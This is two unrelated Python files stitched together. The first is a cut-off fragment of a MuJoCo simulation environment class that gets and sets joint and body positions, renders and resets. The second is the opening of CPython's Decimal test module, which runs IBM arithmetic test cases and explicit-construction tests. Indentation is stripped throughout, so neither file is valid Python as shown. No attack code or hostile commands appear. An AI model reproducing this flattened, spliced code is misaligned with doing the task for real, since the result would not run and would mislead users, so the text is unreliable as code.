if attr in self.geom.jnt_names:
jnts = self._jnt_inds[attr]
bnds = self.geom.get_joint_limits(attr)
vals = self.get_joints(jnts, vec=True)
return np.maximum(np.minimum(bnds[1], vals), bnds[0])
if attr == 'pose' or attr == 'pos':
return self.get_item_pos(name, mujoco_frame)
if attr in ['rot', 'rotation', 'quat', 'euler']:
euler = attr == 'euler'
return self.get_item_rot(name, mujoco_frame, euler)
if hasattr(self, 'get_{}'.format(attr)):
return getattr(self, 'get_{}'.format(attr))(name, mujoco_frame=True)
raise NotImplementedError('Could not retrieve value of {} for {}'.format(attr, name))
def set_attr(self, name, attr, val, mujoco_frame=True, forward=True):
if attr in self.geom.jnt_names:
jnts = self.geom.jnt_names[attr]
if len(val) == 1: val = [val[0] for _ in jnts]
return self.set_joints(dict(zip(jnts, val)), forward=forward)
if attr == 'pose' or attr == 'pos':
return self.set_item_pos(name, val, mujoco_frame, forward=forward)
if attr in ['rot', 'rotation', 'quat', 'euler']:
return self.set_item_rot(name, val, mujoco_frame, forward=forward)
if hasattr(self, 'set_{}'.format(attr)):
return getattr(self, 'set_{}'.format(attr))(name, val, mujoco_frame, forward=forward)
raise NotImplementedError('Could not set value of {} for {}'.format(attr, name))
def get_pos_from_label(self, label, mujoco_frame=True):
try:
pos = self.get_item_pos(label, mujoco_frame)
except:
pos = None
return pos
def get_item_pos(self, name, mujoco_frame=True, rot=False):
model = self.physics.model
item_type = 'joint'
if name in self._type_cache:
item_type = self._type_cache[name]
pos = [np.nan, np.nan, np.nan]
if rot: pos.append(np.nan)
if item_type == 'joint':
try:
ind = model.name2id(name, 'joint')
adr = model.jnt_qposadr[ind]
if rot:
pos = self.physics.data.qpos[adr+3:adr+7].copy()
else:
pos = self.physics.data.qpos[adr:adr+3].copy()
self._type_cache[name] = 'joint'
except Exception as e:
item_type = 'body'
if item_type == 'body':
try:
item_ind = model.name2id(name, 'body')
arr = self.physics.data.xquat if rot else self.physics.data.xpos
pos = arr[item_ind].copy()
# pos = self.physics.data.xpos[item_ind].copy()
self._type_cache[name] = 'body'
except Exception as e:
item_ind = -1
assert not np.any(np.isnan(pos))
return pos
def get_item_rot(self, name, mujoco_frame=True, to_euler=False):
rot = self.get_item_pos(name, mujoco_frame, True)
if to_euler:
rot = T.quaternion_to_euler(rot)
return rot
def set_item_pos(self, name, pos, mujoco_frame=True, forward=True, rot=False):
item_type = 'joint'
if np.any(np.isnan(pos)): return
if name in self._type_cache:
item_type = self._type_cache[name]
if item_type == 'joint':
try:
ind = self.physics.model.name2id(name, 'joint')
adr = self.physics.model.jnt_qposadr[ind]
if rot:
old_pos = self.physics.data.qpos[adr+3:adr+7]
self.physics.data.qpos[adr+3:adr+7] = pos
else:
old_pos = self.physics.data.qpos[adr:adr+3]
self.physics.data.qpos[adr:adr+3] = pos
self._type_cache[name] = 'joint'
except Exception as e:
item_type = 'body'
if item_type == 'body':
try:
ind = self.physics.model.name2id(name, 'body')
if rot:
old_pos = self.physics.data.xquat[ind]
self.physics.data.xquat[ind] = pos
else:
old_pos = self.physics.data.xpos[ind]
self.physics.data.xpos[ind] = pos
self.physics.model.body_pos[ind] = pos
# old_pos = self.physics.model.body_pos[ind]
item_type = 'body'
self._type_cache[name] = 'body'
except:
item_type = 'unknown'
print(('Could not shift item', name))
if forward:
self.physics.forward()
def set_item_rot(self, name, rot, use_euler=False, mujoco_frame=True, forward=True):
if use_euler or len(rot) == 3:
rot = T.euler_to_quaternion(rot, 'wxyz')
self.set_item_pos(name, rot, mujoco_frame, forward, True)
def get_joints(self, jnts, sizes=None, vec=False):
if vec:
vals = []
else:
vals = {}
for i, jnt in enumerate(jnts):
if type(jnt) is not int:
jnt = self.physics.model.name2id(jnt, 'joint')
adr = self.physics.model.jnt_qposadr[jnt]
size = 1
if sizes is not None:
size = sizes[i]
if vec:
vals.extend(self.physics.data.qpos[adr:adr+size])
else:
name = self.physics.model.id2name(jnt, 'joint')
vals[name] = self.physics.data.qpos[adr:adr+size]
return vals
def set_joints(self, jnts, forward=True):
for jnt, val in list(jnts.items()):
if type(jnt) is not int:
jnt = self.physics.model.name2id(jnt, 'joint')
adr = self.physics.model.jnt_qposadr[jnt]
offset = 1
if hasattr(val, '__len__'):
offset = len(val)
self.physics.data.qpos[adr:adr+offset] = val
if forward:
self.physics.forward()
def get_jnt_vec(self, jnts):
if not len(jnts): return self.physics.data.qpos
vals = []
for name in jnts:
ind = self.physics.model.name2id(name, 'joint')
adr = self.physics.model.jnt_qposadr[ind]
vals.append(adr)
return self.physics.data.qpos[vals]
def get_disp(self, body1, body2):
pos1 = self.get_item_pos(body1)
        pos2 = self.get_item_pos(body2)
return pos2 - pos1
def get_body_info(self):
info = {}
for i in range(self.physics.model.nbody):
info[i] = {
'name': self.physics.model.id2name(i, 'body'),
'pos': self.physics.data.xpos[i],
'quat': self.physics.data.xquat[i],
}
return info
def get_jnt_info(self):
info = {}
dofadr = self.physics.model.jnt_dofadr
for i in range(self.physics.model.njnt):
            inds = (dofadr[i], dofadr[i + 1]) if i < self.physics.model.njnt - 1 else (dofadr[i], self.physics.model.nv)  # nv is the total DoF count; 'njnts' was a typo
body_id = self.physics.model.jnt_bodyid[i]
info[i] = {
'name': self.physics.model.id2name(i, 'joint'),
'angle': self.physics.data.qpos[inds[0]:inds[1]],
'dofadr': inds,
'body': self.physics.model.id2name(body_id, 'body'),
'parent_body': self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body')
}
return info
def get_geom_dimensions(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1):
'''
Geom type options:
mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
'''
if geom_ind >= 0:
            return self.physics.model.geom_size[geom_ind]
inds = np.where(self.physics.model.geom_type == geom_type)
return self.physics.model.geom_size[inds]
def get_geom_positions(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1):
'''
Geom type options:
mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
'''
if geom_ind >= 0:
            return self.physics.model.geom_pos[geom_ind]
inds = np.where(self.physics.model.geom_type == geom_type)
return self.physics.data.geom_xpos[inds]
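    # Usage sketch for the two geom helpers above (illustrative only; assumes a
    # loaded model containing box geoms and that `env` is an instance of this class):
    #   box_sizes = env.get_geom_dimensions(geom_type=enums.mjtGeom.mjGEOM_BOX)
    #   box_positions = env.get_geom_positions(geom_type=enums.mjtGeom.mjGEOM_BOX)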
# def get_geom_rotations(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1, use_euler=False):
# '''
# Geom type options:
# mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
# '''
# if geom_ind >= 0:
# return self.physics.model.geom_quat[ind]
# inds = np.where(self.physics.model.geom_type == geom_type)
# rots = self.physics.data.geom_xquat[inds]
# if use_euler:
# return np.array([T.quaternion_to_euler(r) for r in rots])
# return rots
def get_camera_info(self, camera_name):
ind = self.physics.model.name2id(camera_name, 'camera')
fovy = self.physics.model.cam_fovy[ind].copy()
pos = self.physics.data.cam_xpos[ind].copy()
mat = self.physics.data.cam_xmat[ind].copy()
return fovy, pos, mat
    def record_video(self, fname, actions=None, states=None, height=0, width=0, camera_id=0, mode='position'):
if not self.load_render:
raise AssertionError('Cannot record video if the renderer is not loaded')
elif actions is None and states is None:
raise AssertionError('Must pass either action or state trajectory to record video')
ims = []
buf = actions if actions is not None else states
for step in buf:
if actions is not None: self.step(step, mode=mode)
if states is not None: self.set_state(step)
im = self.render(camera_id=camera_id, height=height, width=width, view=False)
ims.append(im)
np.save(fname, ims)
def set_user_data(self, key, data):
self._user_data[key] = data
def get_user_data(self, key, default=None):
return self._user_data.get(key, default)
def compute_reward(self):
return 0
def is_done(self):
return self._cur_iter >= self._max_iter
def get_text_overlay(self, title='', body='', style='normal', position='top left'):
return TextOverlay(title, body, style, position)
def render(self, mode='rgb_array', height=0, width=0, camera_id=0,
overlays=(), depth=False, scene_option=None, view=False,
forward=False):
if not self.load_render: return None
# Make friendly with dm_control or gym interface
depth = depth or mode == 'depth_array'
view = view or mode == 'human'
if height == 0: height = self.im_height
if width == 0: width = self.im_wid
if forward: self.physics.forward()
pixels = None
if self._cache_rendering:
prev_x, prev_q = self._last_rendered_state
x_changed = prev_x is None or np.any(np.abs(prev_x - self.physics.data.xpos) > 1e-5)
q_changed = prev_q is None or np.any(np.abs(prev_q - self.physics.data.qpos) > 1e-5)
if x_changed or q_changed:
self._cached_images = {}
self._last_rendered_state = (self.physics.data.xpos.copy(), self.physics.data.qpos.copy())
elif (camera_id, height, width) in self._cached_images:
pixels = self._cached_images[(camera_id, height, width)]
if pixels is None:
pixels = self.physics.render(height, width, camera_id, overlays, depth, scene_option)
if self._cache_rendering: self._cached_images[(camera_id, height, width)] = pixels
if view and self.use_viewer:
self._render_viewer(pixels)
return pixels
def reset(self):
self._cur_iter = 0
self.physics.reset()
# self._reload_viewer()
self.ctrl_data = {}
self.cur_time = 0.
self.prev_time = 0.
self.physics.data.qpos[:] = 0.
self.physics.data.qvel[:] = 0.
        self.physics.data.qacc[:] = 0.
self.physics.forward()
return self.get_obs()
def close(self):
self.active = False
if self._viewer is not None and self.use_glew:
self._viewer.close()
self._viewer = None
self.physics.free()
def seed(self, seed=None):
np.random.seed(seed)
random.seed(seed)
def list_joint_info(self):
for i in range(self.physics.model.njnt):
            print('\nJnt', i, ':', self.physics.model.id2name(i, 'joint'))
            print('Axis :', self.physics.model.jnt_axis[i])
            print('Dof adr :', self.physics.model.jnt_dofadr[i])
            body_id = self.physics.model.jnt_bodyid[i]
            print('Body :', self.physics.model.id2name(body_id, 'body'))
            print('Parent body :', self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body'))
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former tests
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
tests the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from the command line with one parameter (Arithmetic
or Behaviour) to test each part, or without a parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
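# For example, if an operation sets both Rounded and Inexact, a test that traps
# both signals expects Inexact (later in OrderedSignals) to be raised first.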
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
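        # e.g. a .decTest line using 'squareroot' is dispatched to Context.sqrt,
        # and one using 'toeng' to Context.to_eng_string.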
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
